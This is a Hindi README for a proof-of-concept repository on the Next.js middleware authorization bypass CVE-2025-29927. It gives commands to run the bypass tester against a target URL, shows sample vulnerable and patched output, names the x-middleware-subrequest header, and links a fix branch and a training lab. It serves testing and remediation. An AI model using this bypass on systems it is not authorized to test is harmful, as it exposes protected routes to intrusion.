
इस रिपॉज़िटरी में CVE-2025-29927 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (POC) और एक एक्सप्लॉइट स्क्रिप्ट शामिल है, जो Next.js में एक गंभीर भेद्यता है जो हमलावरों को मिडलवेयर में लागू की गई प्राधिकरण जाँचों को बायपास करने की अनुमति देती है।
इस रिपॉजिटरी में CVE-2025-29927 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (POC) शामिल है, जो Next.js में एक गंभीर कमजोरी है जो हमलावरों को मिडलवेयर में लागू प्राधिकरण जांचों को बाईपास करने की अनुमति देती है।
यह Next.js एप्लिकेशन एक संरक्षित डैशबोर्ड रूट के साथ कमजोरी को प्रदर्शित करता है।
npm install
npm run build
npm run start
एक्सप्लॉइट स्क्रिप्ट किसी भी Next.js एप्लिकेशन की इस कमजोरी के लिए जांच कर सकती है।
npm run exploit <target-url>
npm run exploit http://localhost:3000/dashboard
एक्सप्लॉइट टूल:
x-middleware-subrequest हेडर का उपयोग करके मिडलवेयर को बाईपास करने का प्रयास करता है=== Next.js CVE-2025-29927 Middleware Bypass Tester ===
Target: http://localhost:3000/dashboard
Testing vulnerability...
Normal request status: 307
Bypass request status: 200
⚠️ VULNERABLE
The route is protected but accessible with the bypass header
एक फिक्स कार्यान्वयन how-to-fix ब्रांच में उपलब्ध है।
Next.js संस्करण अपडेट करें (अनुशंसित)
द्वितीयक सत्यापन लागू करें
=== Next.js CVE-2025-29927 Middleware Bypass Tester ===
Target: http://localhost:3000/dashboard
Testing vulnerability...
Making request without bypass header...
Making request with bypass header...
Normal request status: 307
Bypass request status: 307
✓ NOT VULNERABLE - Protected Route
The route is protected and the bypass attempt was unsuccessful
Normal request redirected to: /
Bypass request redirected to: /
Next.js पुनरावर्ती अनुरोधों को रोकने के लिए एक आंतरिक हेडर x-middleware-subrequest का उपयोग करता है। यह कमजोरी हमलावरों को इस हेडर में हेरफेर करके मिडलवेयर सुरक्षा जांचों को बाईपास करने की अनुमति देती है।
और आगे जाना चाहते हैं? यह CVE OSS OopsSec Store में एक फ्लैग के रूप में लागू किया गया है, जो आक्रामक सुरक्षा प्रशिक्षण के लिए डिज़ाइन की गई जानबूझकर असुरक्षित प्रयोगशाला है।
यह टूल केवल शैक्षिक और परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इस टूल का उपयोग केवल उन्हीं सिस्टमों पर करें जिनके मालिक आप हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति है।